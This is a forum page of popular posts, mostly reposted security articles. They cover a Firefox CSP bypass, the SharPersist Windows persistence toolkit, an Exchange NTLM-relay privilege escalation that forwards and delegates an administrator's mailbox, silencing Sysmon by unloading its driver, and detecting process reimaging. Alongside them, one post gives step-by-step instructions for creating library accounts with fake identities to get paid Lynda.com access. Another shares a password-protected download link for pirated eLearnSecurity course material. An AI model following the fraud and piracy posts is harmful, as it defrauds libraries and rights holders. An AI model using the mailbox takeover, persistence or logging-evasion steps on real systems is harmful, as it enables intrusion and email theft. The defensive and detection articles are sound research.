Jump to content


Popular Content

Showing content with the highest reputation since 09/22/19 in Posts

  1. 6 points
    Real-Time Voice Cloning This repository is an implementation of Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis (SV2TTS) with a vocoder that works in real-time. Feel free to check my thesis if you're curious or if you're looking for info I haven't documented yet (don't hesitate to make an issue for that too). Mostly I would recommend giving a quick look to the figures beyond the introduction. SV2TTS is a three-stage deep learning framework that allows to create a numerical representation of a voice from a few seconds of audio, and to use it to condition a text-to-speech model trained to generalize to new voices. Video demonstration (click the picture): Papers implemented URL Designation Title Implementation source 1806.04558 SV2TTS Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis This repo 1802.08435 WaveRNN (vocoder) Efficient Neural Audio Synthesis fatchord/WaveRNN 1712.05884 Tacotron 2 (synthesizer) Natural TTS Synthesis by Conditioning Wavenet on Mel Spectrogram Predictions Rayhane-mamah/Tacotron-2 1710.10467 GE2E (encoder) Generalized End-To-End Loss for Speaker Verification This repo News 20/08/19: I'm working on resemblyzer, an independent package for the voice encoder. You can use your trained encoder models from this repo with it. 06/07/19: Need to run within a docker container on a remote server? See here. 25/06/19: Experimental support for low-memory GPUs (~2gb) added for the synthesizer. Pass --low_mem to demo_cli.py or demo_toolbox.py to enable it. It adds a big overhead, so it's not recommended if you have enough VRAM. Quick start Requirements You will need the following whether you plan to use the toolbox only or to retrain the models. Python 3.7. Python 3.6 might work too, but I wouldn't go lower because I make extensive use of pathlib. Run pip install -r requirements.txt to install the necessary packages. Additionally you will need PyTorch (>=1.0.1). A GPU is mandatory, but you don't necessarily need a high tier GPU if you only want to use the toolbox. Pretrained models Download the latest here. Preliminary Before you download any dataset, you can begin by testing your configuration with: python demo_cli.py If all tests pass, you're good to go. Datasets For playing with the toolbox alone, I only recommend downloading LibriSpeech/train-clean-100. Extract the contents as <datasets_root>/LibriSpeech/train-clean-100 where <datasets_root> is a directory of your choosing. Other datasets are supported in the toolbox, see here. You're free not to download any dataset, but then you will need your own data as audio files or you will have to record it with the toolbox. Toolbox You can then try the toolbox: python demo_toolbox.py -d <datasets_root> or python demo_toolbox.py depending on whether you downloaded any datasets. If you are running an X-server or if you have the error Aborted (core dumped), see this issue. Wiki How it all works (WIP - stub, you might be better off reading my thesis until it's done) Training models yourself Training with other data/languages (WIP - see here for now) TODO and planned features Contribution Feel free to open issues or PRs for any problem you may encounter, typos that you see or aspects that are confusing. I try to reply to every issue. I'm working full-time as of June 2019. I won't be making progress of my own on this repo, but I will still gladly merge PRs and accept contributions to the wiki. Don't hesitate to send me an email if you wish to contribute. Sursa: https://github.com/CorentinJ/Real-Time-Voice-Cloning
  2. 4 points
    Cand o sa am timp o sa fac curatenie (fara sa mai tin cont de vechimea si utilitatea userilor care fac caterinca si injura). Desi nu e cea mai buna intrebare, dati voi dovada de inteligenta si oferiti un raspuns din care sa inteleaga cum functioneaza lucrurile.
  3. 3 points
    A technique to evade Content Security Policy (CSP) leaves surfers using the latest version of Firefox vulnerable to cross-site scripting (XSS) exploits. Researcher Matheus Vrech uncovered a full-blown CSP bypass in the latest version of Mozilla’s open source web browser that relies on using an object tag attached to a data attribute that points to a JavaScript URL. The trick allows potentially malicious content to bypass the CSP directive that would normally prevent such objects from being loaded. Vrech developed proof-of-concept code that shows the trick working in the current version of Firefox (version 69). The Daily Swig was able to confirm that the exploit worked. The latest beta versions of Firefox are not vulnerable, as Vrech notes. Chrome, Safari, and Edge are unaffected. If left unaddressed, the bug could make it easier to execute certain XSS attacks that would otherwise be foiled by CSP. The Daily Swig has invited Mozilla to comment on Vrech’s find, which he is hoping will earn recognition under the software developer’s bug bounty program. The researcher told The Daily Swig about how he came across the vulnerability. “I was playing ctf [capture the flag] trying to bypass a CSP without object-src CSP rule and testing some payloads I found this non intended (by anyone) way,” he explained. “About the impact: everyone that was stuck in a bug bounty XSS due to CSP restrictions should have reported it by this time.” Content Security Policy is a technology set by websites and used by browsers that can block external resources and prevent XSS attacks. PortSwigger researcher Gareth Heyes discussed this and other aspect of browser security at OWASP’s flagship European event late last month. Sursa: https://portswigger.net/daily-swig/firefox-vulnerable-to-trivial-csp-bypass
  4. 3 points
    Sursa Financial Times. La revedere cryptografie asa cum o stim? ...
  5. 2 points
    1. Intrati pe Cuyahoga County Public Library 2. Click pe "My Account" si apoi "Create Account" 2. Deschideti Fake Name Generator 3. Introduceti datele de pe Fake Name Generator in contul de Cuyahoga Library, cu doua mentiuni: puneti cod postal de Ohio si adresa de e-mail la care sa aveti acces. 4. Intrati pe E-Mail si copiati Acces Number-ul, dupa care va logati pe Cuyahoga County Public Library, introduceti doar Acces Number-ul, dupa care va pune sa va creati un PIN Number format din 4 cifre. 5. Intrati pe Lynda.com, selectati "Sign In", dupa care selectati "Sign in with your organization portal". Acolo introduceti link-ul de la librarie, dupa care Acces Number-ul si PIN-ul pe care tocmai vi l-ati ales. Si gata, aveti cont. Daca aveti intrebari, intrebati-ma in mod inteligent. Daca stiati deja asta, puteti sari peste topic. Nu stiu cat dureaza chestia asta, insa chiar si o luna daca aveti acces, este ok. Va ia maxim 5 minute sa creati tot ceea ce am explicat mai sus. Hai bafta. EDIT: Nu numai la Cuyahoga Library merge. Puteti intra pe Free Library si va alegeti de acolo o librarie, insa una care sa emita card online. Cu tot cu AN si PIN.
  6. 2 points
    Sudo Flaw Lets Linux Users Run Commands As Root Even When They're Restricted Attention Linux Users! A new vulnerability has been discovered in Sudo—one of the most important, powerful, and commonly used utilities that comes as a core command installed on almost every UNIX and Linux-based operating system. The vulnerability in question is a sudo security policy bypass issue that could allow a malicious user or a program to execute arbitrary commands as root on a targeted Linux system even when the "sudoers configuration" explicitly disallows the root access. Sudo, stands for "superuser do," is a system command that allows a user to run applications or commands with the privileges of a different user without switching environments—most often, for running commands as the root user. By default on most Linux distributions, the ALL keyword in RunAs specification in /etc/sudoers file, as shown in the screenshot, allows all users in the admin or sudo groups to run any command as any valid user on the system. Reference Link : https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html?fbclid=IwAR1V9EZDp75uQdBgcQxV4t4C0THHguOtNkIk7o1PfapQPJEt9FaZmFK58Mg
  7. 2 points
    Odata intrat acolo nu mai e scapare sa stii.Am supravietuit doar o saptamana pe acolo :)))
  8. 2 points
    Consola de jocuri retro bazata pe Raspberry Pi 3 Model B - Carcasa Kintaro Super Kuma 9000, cu buton de Power on/off, buton de reset, ventilator - Raspberry Pi 3 Model B, cu card SD 16GB Toshiba - Incarcator 3A 5V bun, care nu subvolteaza Butoanele sunt functionale ambele. Carcasa are ventilator instalat, care functioneaza cand placa este solicitata, am folosit inclusiv Arctic MX-4 pentru temperaturi mai bune. Pe cardul SD am instalat Retropie si ROM-uri pentru diverse emulatoare. Practic sistemul are tot ce va trebuie pe el pentru a juca. Pret: 200 RON
  9. 2 points
    Threat Research SharPersist: Windows Persistence Toolkit in C# September 03, 2019 | by Brett Hawkins powershell persistence Toolkit Windows Background PowerShell has been used by the offensive community for several years now but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advancements include Script Block Logging, Antimalware Scripting Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits such as Seatbelt, SharpUp and SharpView have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows Persistence Toolkit created by FireEye Mandiant’s Red Team called SharPersist. Windows Persistence During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component in the attack lifecycle, shown in Figure 1. Figure 1: FireEye Attack Lifecycle Diagram Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lay dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service. There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, registry, and startup folder, and there continues to be more discovered. For a more thorough list, see the MITRE ATT&CK persistence page. Figure 2: Persistence equation SharPersist Overview SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike’s “execute-assembly” functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several items related to tradecraft that have been built-in to the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden. SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page. SharPersist Persistence Techniques There are several persistence techniques that are supported in SharPersist at the time of this blog post. A full list of these techniques and their required privileges is shown in Figure 3. Technique Description Technique Switch Name (-t) Admin Privileges Required? Touches Registry? Adds/Modifies Files on Disk? KeePass Backdoor KeePass configuration file keepass No No Yes New Scheduled Task Creates new scheduled task schtask No No Yes New Windows Service Creates new Windows service service Yes Yes No Registry Registry key/value creation/modification reg No Yes No Scheduled Task Backdoor Backdoors existing scheduled task with additional action schtaskbackdoor Yes No Yes Startup Folder Creates LNK file in user startup folder startupfolder No No Yes Tortoise SVN Creates Tortoise SVN hook script tortoisesvn No Yes No Figure 3: Table of supported persistence techniques SharPersist Examples On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below. Registry Persistence The first technique that will be highlighted is the registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4. Registry Key Code (-k) Registry Key Registry Value Admin Privileges Required? Supports Env Optional Add-On (-o env)? hklmrun HKLM\Software\Microsoft\Windows\CurrentVersion\Run User supplied Yes Yes hklmrunonce HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce User supplied Yes Yes hklmrunonceex HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx User supplied Yes Yes userinit HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit Yes No hkcurun HKCU\Software\Microsoft\Windows\CurrentVersion\Run User supplied No Yes hkcurunonce HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce User supplied No Yes logonscript HKCU\Environment UserInitMprLogonScript No No stickynotes HKCU\Software\Microsoft\Windows\CurrentVersion\Run RESTART_STICKY_NOTES No No Figure 4: Supported registry keys table In the following example, we will be performing a validation of our arguments and then will add registry persistence. Performing a validation before adding the persistence is a best practice, as it will make sure that you have the correct arguments, and other safety checks before actually adding the respective persistence technique. The example shown in Figure 5 creates a registry value named “Test” with the value “cmd.exe /c calc.exe” in the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key. Figure 5: Adding registry persistence Once the persistence needs to be removed, it can be removed using the “-m remove” argument, as shown in Figure 6. We are removing the “Test” registry value that was created previously, and then we are listing all registry values in “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” to validate that it was removed. Figure 6: Removing registry persistence Startup Folder Persistence The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we are creating an LNK file called “Test.lnk” that will be placed in the current user’s startup folder and will execute “cmd.exe /c calc.exe”, shown in Figure 7. Figure 7: Performing dry-run and adding startup folder persistence The startup folder persistence can then be removed, again using the “-m remove” argument, as shown in Figure 8. This will remove the LNK file from the current user’s startup folder. Figure 8: Removing startup folder persistence Scheduled Task Backdoor Persistence The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9. Figure 9: Listing scheduled tasks that run at logon Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will successfully work and then actually execute the command as shown in Figure 10. Figure 10: Performing dry run and adding scheduled task backdoor persistence As you can see in Figure 11, the scheduled task is now backdoored with our malicious action. Figure 11: Listing backdoored scheduled task A backdoored scheduled task action used for persistence can be removed as shown in Figure 12. Figure 12: Removing backdoored scheduled task action Conclusion Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community and persistence is no exception. Windows provides multiple techniques for persistence and there will continue to be more discovered and used by security professionals and adversaries alike. This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques that are available in Windows and the ability to use these persistence techniques with C# rather than PowerShell. Sursa: https://www.fireeye.com/blog/threat-research/2019/09/sharpersist-windows-persistence-toolkit.html
  10. 2 points
    Mi-a cerut un service 80 ron, mi-am bagat pula in mortii lui, in 3, 4, 5h il rezolvi, si ramai cu banii de senvici si tigari si bere, incearca pe https://forum.xda-developers.com/
  11. 1 point
  12. 1 point
    Da frate @SynTAX bine ca m-ai atentionat, uite @adytzu123456, am un cod de invitatie pus cu hidden sa nu vada cei neinregistrati, sa il folosesti ca expira in 24h.
  13. 1 point
    @aismen vezi ca vrea omu invitatie. Parca tu aveai.
  14. 1 point
  15. 1 point
    1- Web Application Penetration Testing eXtreme (eWPTX ) ---------------------------------------------------- 03. Website_cloning.mp4 03. From_An_XSS_To_A_SQL_Injection.mp4 03. Keylogging.mp4 09. Advanced XXE Exploitation.MP4 07. Advanced_SecondOrder_SQL_Injection_Exploitation.mp4 05. Advanced_XSRF_Exploitation_part_i.mp4 06. Advanced_XSRF_Exploitation_part_ii.mp4 09. Advanced_Xpath_Exploitation.mp4 WAPTx sec 9.pdf WAPTx sec 8.pdf WAPTx sec 2.pdf WAPTx sec 3.pdf WAPTx sec 5.pdf WAPTx sec 6.pdf WAPTx sec 4.pdf WAPTx sec 7.pdf WAPTx sec 1.pdf 2- Penetration Testing Professional (ePTPv3) 3- Web Application Penetration Testing (eWAPT v2) ---------------------------------------------------- Penetration Testing Process Introduction Information Gathering Cross Site Scripting SQL Injection Authentication and Authorization Session Security HTML5 File and Resources Attacks Other Attacks Web Services XPath https://mega.nz/#!484ByQRa!N7-wnQ3t5pMCavOvzh8-xMiMKSD2RARozRM99v17-8I Pass: P8@Hu%vbg_&{}/2)p+4T Sursa:
  16. 1 point
    Microsoft Exchange – Privilege Escalation September 16, 2019 Administrator Red Team CVE-2018-8581, Microsoft Exchange, NTLM Relay, Privilege Escalation, PushSubscription Leave a comment Harvesting the credentials of a domain user during a red team operation can lead to execution of arbitrary code, persistence and domain escalation. However information that is stored over emails can be highly sensitive for an organisation and therefore threat actors focus can be to exfiltrate data from emails. This can be achieved either by adding a rule to the mailbox of a target user that will forward emails to an inbox that the attacker controls or by delegating access of a mailbox to their Exchange account. Dustin Childs from Zero Day Initiative discovered a vulnerability in Microsoft Exchange that could allow an attacker to impersonate a target account. This vulnerability exist because by design Microsoft Exchange allows any user to specify a URL for Push Subscription and Exchange will send notifications to this URL. NTLM hashes are also leaked and can be used to authenticate with Exchange Web Services via NTLM relay with the leaked NTLM hash. The technical details of the vulnerability has been covered into the Zero Day Initiative blog. Email Forwarding Accessing the compromised account from Outlook Web Access (OWA) portal and selecting the permissions of the inbox folder will open a new window that will contain the permissions of the mailbox. Inbox Permissions The target account should be added to have permissions over the mailbox. This is required in order to retrieve the SID (Security Identifier) of the account. Add Permissions for the Target Account Opening the Network console in the browser and browsing a mailbox folder will generate a request that will be sent to the Microsoft Exchange server. POST Request to Microsoft Exchange Examining the HTTP Response of the request will unveil the SID of the Administrator account. Administrator SID The implementation of this attack requires two python scripts from the Zero Day Initiative GitHub repository. The serverHTTP_relayNTLM.py script requires the SID of the Administrator that has been retrieved, the IP address of the Exchange with the target port and the email account that has been compromised and is in control of the red team. Configuration serverHTTP_relayNTLM script Once the script has the correct values it can be executed in order to start a relay server. 1 python serverHTTP_relayNTLM.py Relay Server The Exch_EWS_pushSubscribe.py requires the domain credentials and the domain of the compromised account and the IP address of the relay server. Push Subscribe Script Configuration Executing the python script will attempt to send the pushSubscribe requests to the Exchange via EWS (Exchange Web Services). 1 python Exch_EWS_pushSubscribe.py pushSubscribe python script Exchange Response XML Reponse The NTLM hash of the Administrator will be relayed back to the Microsoft Exchange server. Relay Administrator NTLM Relay Administrator NTLM to Exchange Emails tha will be sent to the mailbox of the target account (Administrator) will be forwarded automatically to the mailbox that is under the control of the red team. Email to target account The email will be forwarded at the inbox of the account that the Red Team controls. Email forwarded automatically A rule has been created to the target account by using NTLM relay to authenticate with the Exchange that will forward all the email messages to another inbox. This can be validated by checking the Inbox rules of the target account. Rule – Forward Admin Emails Delegate Access Microsoft Exchange users can connect their account (Outlook or OWA) to other mailboxes (delegate access) if they have the necessary permissions assigned. Attempting to open directly a mailbox of another account withouth permissions will produce the following error. Open Another Mailbox – No Permissions There is a python script which is exploiting the same vulnerability but instead of adding a forwarding rule is assigning permissions to the account to access any mailbox in the domain including domain administrator. The script requires valid credentials, the IP address of the Exchange server and the target email account. Script Configuration Executing the python script will attempt to perform the elevation. 1 python2 CVE-2018-8581.py Privilege Escalation Script Once the script is finished a message will appear that will inform the user that the mailbox of the target account can be displayed via Outlook or Outlook Web Access portal. Privilege Escalation Script – Delegation Complete Authentication with Outlook Web Access is needed in order to be able to view the delegated mailbox. Outlook Web Access Authentication Outlook Web Access has a functionality which allows an Exchange user to open the mailbox of another account if he has permissions. Open Another Mailbox The following Window will appear on the screen. Open Another Mailbox Window The mailbox of the Administrator will open in another tab to confirm the elevation of privileges. References https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange https://github.com/thezdi/PoC/tree/master/CVE-2018-8581 https://github.com/WyAtu/CVE-2018-8581 Sursa: https://pentestlab.blog/2019/09/16/microsoft-exchange-privilege-escalation/
  17. 1 point
    Shhmon — Silencing Sysmon via Driver Unload Matt Hand Follow Sep 18 · 4 min read Sysmon is an incredibly powerful tool to aide in data collection beyond Windows’ standard event logging capabilities. It presents a significant challenge for us as attackers as it has the ability to detect many indicators that we generate during operations, such as process creation, registry changes, file creation, among many other things. Sysmon is comprised of 2 main pieces — a system service and a driver. The driver provides the service with information which is processed for consumption by the user. Both the service and the driver’s names can be changed from their defaults to obfuscate the fact that Sysmon is running on the host. Today I am releasing Shhmon, a C# tool to challenge the assumption that our defensive tools are functioning as intended. This also introduces a situation where the Sysmon driver has been unloaded by a user without fltMC.exe and the service is still running. https://github.com/matterpreter/Shhmon Despite being able to rename the Sysmon driver during installation (Sysmon.exe -i -d $DriverName), it is loaded at a predefined altitude of 385201 at installation. A driver altitude is a unique identifier allocated by Microsoft indicating the driver’s position relative to others in the file systems stack. Think of this as a driver’s assigned parking spot. Each driver has a reserved spot where it is supposed to park. The driver should abide by this allocation. We can use functions supplied in fltlib.dll (FilterFindFirst() and FilterFindNext()) to hunt for a driver at 385201 & unload it. This is similar to the functionality behind fltMC.exe unload $DriverName , but allows us to evade command line logging which would be captured by Sysmon before the driver is unloaded. In order to unload the driver, the current process token needs to have SeLoadDriverPrivileges enabled, which Shhmon grants to itself using advapi32!AdjustTokenPrivileges. Defensive Guidance This technique generates interesting events worth investigating and correlating. Sysmon Event ID 255 Once the driver is unloaded, an error event with an ID of DriverCommunication will be generated. After this error occurs, logs will no longer be collected and parsed by Sysmon. Windows System Event ID 1 This event will also be generated on unload from the source “FilterManager” stating File System Filter <DriverName\> (Version 0.0, <Timestamp>) unloaded successfully. This event was not observed to be generated during a normal system restart. Windows Security Event ID 4672 In order to unload the driver, our Shhmon process needs to be granted SeLoadDriverPrivileges. During testing, this permission was only sporadically granted to NT AUTHORITY\SYSTEM and is not a part of its standard permission set. Sysmon Event ID 1/Windows Security Event ID 4688 Despite the intent of evading command line logging by using the API, the calling process will still be logged. An abnormal, high integrity process which is assigned SeLoadDriverPrivilege could be correlated with the above events to serve as a starting point for hunting. Bear in mind that this assembly could be used via something like Cobalt Strike’s execute-assembly functionality, where a seemingly innocuous binary would be the calling process. Going beyond these, I have found that Sysmon’s driver’s altitude can be changed via the registry. reg add "HKLM\SYSTEM\CurrentControlSet\Services\<DriverName>\Instances\Sysmon Instance" /v Altitude /t REG_SZ /d 31337 When the system is rebooted, the driver will be reloaded at the newly specified altitude. Sysmon with a non-default driver name running at altitude 31337 The new altitude could be discovered by reading the registry key HKLM:\SYSTEM\CurrentControlSet\Services\*\Instances\Sysmon Instance\Altitude, but this adds an additional layer of obfuscation which will need to be accounted for by an attacker. Note: I have found during testing that if the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. Additionally, there may be an opportunity to audit a handle opening on the \\.\FltMgr device object, which is done by fltlib!FilterUnload, by applying a SACL to the device object. Many thanks Matt Graeber and Brian Reitz for helping me hone in on these. References: Research inspiration from @Carlos_Perez’s post describing this tactic, as well as Matt Graeber and Lee Christensen’s Black Hat USA 2018 white paper. Alexsey Kabanov’s LazyCopy minifilter for demonstrating the marshaling of filter information and their method for creating resizable buffers. Posts By SpecterOps Team Members Written by Matt Hand I like red teaming, picking up heavy things, and burritos. Adversary Simulation @ SpecterOps. github.com/matterpreter Sursa: https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650
  18. 1 point
    You Can Run, But You Can’t Hide — Detecting Process Reimaging Behavior Jonathan Johnson Follow Sep 16 · 9 min read Background: Around 3 months ago, a new attack technique was introduced to the InfoSec community known as “Process Reimaging.” This technique was released by the McAfee Security team in a blog titled — “In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass.” A few days after this attack technique was released, a co-worker and friend of mine — Dwight Hohnstein — came out with proof of concept code demonstrating this technique, which can be found on his GitHub. While this technique isn’t yet mapped to MITRE ATT&CK, I believe it would fall under the Defense Evasion Tactic. Although the purpose of this blog post is to show the methodology used to build a detection for this attack, it assumes you have read the blog released by the McAfee team and have looked at Dwight’s proof of concept code. A brief high level outline of the attack is as follows: Process Reimaging is an attack technique that leverages inconsistencies in how the Windows Operating System determines process image FILE_OBJECT locations. This means that an attacker can drop a binary on disk and hide the physical location of that file by replacing its initial execution full file path with a trusted binary. This in turn allows an adversary to bypass Windows operating system process attribute verification, hiding themselves in the context of the process image of their choosing. There are three stages involved in this attack: A binary dropped to disk — This assumes breach and that the attacker can drop a binary to disk. Undetected binary loaded. This will be the original image loaded after process creation. The malicious binary is “reimaged” to a known good binary they’d like to appear as. This is achievable because the Virtual Address Descriptors (VADs) don’t update when the image is renamed. Consequently, this allows the wrong process image file information to be returned when queried by applications. This allows an adversary the opportunity to defensively evade detection efforts by analysts and incident responders. Too often organizations are not collecting the “right” data. Often, the data is unstructured, gratuitous, and lacking the substantive details required to arrive at a conclusion. Without quality data, organizations are potentially blind to techniques being ran across their environment. Moreover, by relying too heavily on the base configurations of EDR products (i.e. Windows Defender, etc.) you yield the fine-grained details of detection to a third party which may or may not use the correct function calls to detect this malicious activity (such as the case of GetMappedFileName properly detecting this reimaging). Based off of these factors, this attack allows the adversary to successfully evade detection. For further context and information on this attack, check out the Technical Deep Dive portion in the original blog post on this topic. Note: GetMappedFileName is an API that is used by applications to query process information. It checks whether the address requested is within a memory-mapped file in the address space of the specified process. If the address is within the memory-mapped file it will return the name of the memory-mapped file. This API requires PROCESS_QUERY_INFORMATION and PROCESS_VM_READ access rights. , any time a handle has the access rights PROCESS_QUERY_INFORMATION, it is also granted PROCESS_QUERY_LIMITED_INFORMATION. Those access rights have bitmask 0x1010. This may look familiar, as that is one of the desired access rights used by Mimikatz. Matt Graeber brought to my attention that this is the source of many false positives when trying to detect suspicious access to LSASS based on granted access. Transparency: When this attack was released I spent a Saturday creating a hunt hypothesis, going through the behavioral aspects of the data, and finding its relationships. When reviewing Dwight’s POC I noticed Win32 API calls in the code, and from those I was positive I could correlate those API calls to specific events. because like many defenders I made assumptions regarding EDR products and their logging capabilities. Without a known API to Event ID mapping, I started to map these calls myself. I began (and continue to work on) the Sysmon side of the mapping. This involves reverse engineering the Sysmon driver to map API calls to Event Registration Mechanisms to Event ID’s. Huge shoutout to Matt Graeber, for helping me in this quest and taking the time to teach me the process of reverse engineering. Creating this mapping was a key part of the Detection Strategy that I implemented and would not have been possible without it. Process Reimaging Detection: Detection Methodology: The methodology that was used for this detection is as follows: Read the technical write up of the Process Reimaging attack. Read through Dwight’s POC code. Gain knowledge on how the attack executes, create relationships between data and the behavior of the attack. Execute the attack. Apply the research knowledge with the data relationships to make a robust detection. Detection Walk Through When walking through the Technical Deep Dive portion of the blog, this stood out to me: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ The picture above shows a couple of API calls that were used that particularly piqued my interest. LoadLibrary CreateProcess Based on my research inside of the Sysmon Driver, both of these API calls are funneled through an event registration mechanism. This mechanism is then called upon by the Sysmon Driver using the requisite Input/Output Interface Control (IOCTL) codes to query the data. The queried data will then be pulled back into the Sysmon Binary which then produces the correlating Event ID. For both of the API calls above their correlating processes are shown below: Mapping of Sysmon Event ID 1:Process Creation Mapping of Sysmon Event ID 7:Image Loaded Based off of this research and the technical deep dive section in the McAffee article, I know exactly what data will be generated when this attack is performed. Sysmon should have an Event ID 7 for each call to LoadLibrary, and an Event ID 1 for the call to CreateProcess; however, how do I turn data into actionable data? Data that a threat hunter can easily use and manipulate to suit their needs? To do this, we focus on Data Standardization and Data Quality. Data Quality is derived from Data Standardization. Data Standardization is the process of transforming data into a common readable format that can then be easily analyzed. Data Quality is the process of making sure the environment is collecting the correct data, which can then be rationalized to specific attack techniques. This can be achieved by understanding the behavior of non-malicious data and creating behavioral correlations of the data provided during this attack. For example, when a process is created the OriginalFileName (a relatively new addition to Sysmon) should match the Image section within Sysmon Event ID 1. Say you wanted to launch PowerShell, when you launch PowerShell the OriginalFileName will be Powershell.EXE and the Image will be C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. When these two things don’t match it is possibly an indicator of malicious activity. After process reimaging, and an application calls the GetMappedFileName API to retrieve the process image file, Windows will send back the incorrect file path. A correlation can be made between the Image field in Event ID 1 and the ImageLoaded field in Event ID 7. Since Event ID 1 and 7 both have the OriginalFileName field, an analyst can execute a JOIN on the data for both events. On this JOIN the results will show that the same process path of the process being created and the Image of the process being loaded should equal. With this correlation, one can determine that these two events are from the same activity subset. The correlation above follows this portion of the attack: Function section we are basing Detection from: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ Although a relationship can be made using Sysmon Event ID 1 and Sysmon Event ID 7, another relationship can be made based on the user mode API NtCreateFile. This will go through the event registration mechanism FltRegisterFilter which creates an Event ID 11 — File Creation in Sysmon. This relationship can be correlated on Sysmon Event ID 1’s Image field, which should match Sysmon Event ID 11’s TargetFilename. Sysmon Event ID 1’s ParentProcessGuid should also match Sysmon Event ID 11’s ProcessGuid to ensure the events are both caused by the same process. Now that the research is done, the hypotheses have to be tested. Data Analytics: Below shows the command of the attack being executed. The process (phase1.exe) was created by loading a binary (svchost.exe), then reimaged as lsass.exe. .\CSProcessReimagingPOC.exe C:\Windows\System32\svchost.exe C:\Windows\System32\lsass.exe The following SparkSQL code is the analytics version of what was discussed above: Query ran utilizing Jupyter Notebooks and SparkSQL. Gist I tried to make the JOIN functions as readable to the user as possible. One thing to note is that this query is pulling from the raw data logs within Sysmon. No transformations are being performed within a SIEM pipeline. Below is a visual representation of the joins and data correlations being done within Jupyter Notebooks utilizing SparkSQL. This query was also checked if a file created is subsequently moved to a different directory, as well if the OriginalFileName of a file didn’t equal the Image for Sysmon Event ID 1.(e.g: created process with Image — “ApplyTrustOffline.exe” and OriginalFileName — “ApplyTrustOffline.PROGRAM”) After these checks the query will only bring back the results of the reimaging attack. Graphed View of JOINs in Query The output of the SQL query above can be seen below. You find in the query output of data after the attack seems to have “duplicates” of the events. This isn’t the case. Each time the attack is run, there will be a Sysmon Event ID 11 — FileCreate that fires after each Sysmon Event ID 1 -Process Creation. This correlates to the behavior of the attack that was discussed above. Query Output The dataset and Jupyter Notebook that correlates with the following analysis is available on my GitHub. I encourage anyone to pull it down to analyze the data for themselves. If you don’t have a lab to test it in, one can be found here: https://github.com/jsecurity101/mordor/tree/master/environment/shire/aws. Below breaks down the stages and the information of the dataset that was ran. This correlates with the query that was ran above: One thing to keep in mind is when the malicious binary is reimaged to the binary of the adversaries choosing (stage 3), you will not see that “phase1.exe” was reimaged to “lsass.exe”. This is the behavior of the attack; Windows will send back the improper file object. This doesn’t debunk this detection. The goal is to discover the behavior of the attack, and once that is done you can either follow the ProcessGuid of “phase1.exe” or go to its full path to find the Image of the binary it was reimaged with. “Phase1.exe” will appear under the context of that reimaged binary. Image of the properties of phase1.exe after reimaging is executed Conclusion: Process Reimaging really piqued my interest as it seemed to be focused on flying under the radar to avoid detection. Each technique an attacker leverages will have data that follows the behavior of the attack. This can be leveraged, but only once we understand our data and data sources. Moving away from signature based hunts to more of the data driven hunt methodology will help with the robustness of detections. Thank You: Huge thank you to Matt Graeber for helping me with the reverse engineering process of the Sysmon Driver. To Dwight Hohnstein, for his POC code. Lastly, to Brian Reitz for helping when SQL wasn’t behaving. References/Resources: In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass Dwight’s Process Reimaging POC Microsoft Docs Posts By SpecterOps Team Members Written by Jonathan Johnson Posts By SpecterOps Team Members Posts from SpecterOps team members on various topics relating information security Sursa: https://posts.specterops.io/you-can-run-but-you-cant-hide-detecting-process-reimaging-behavior-e6bb9a10c40b
  19. 1 point
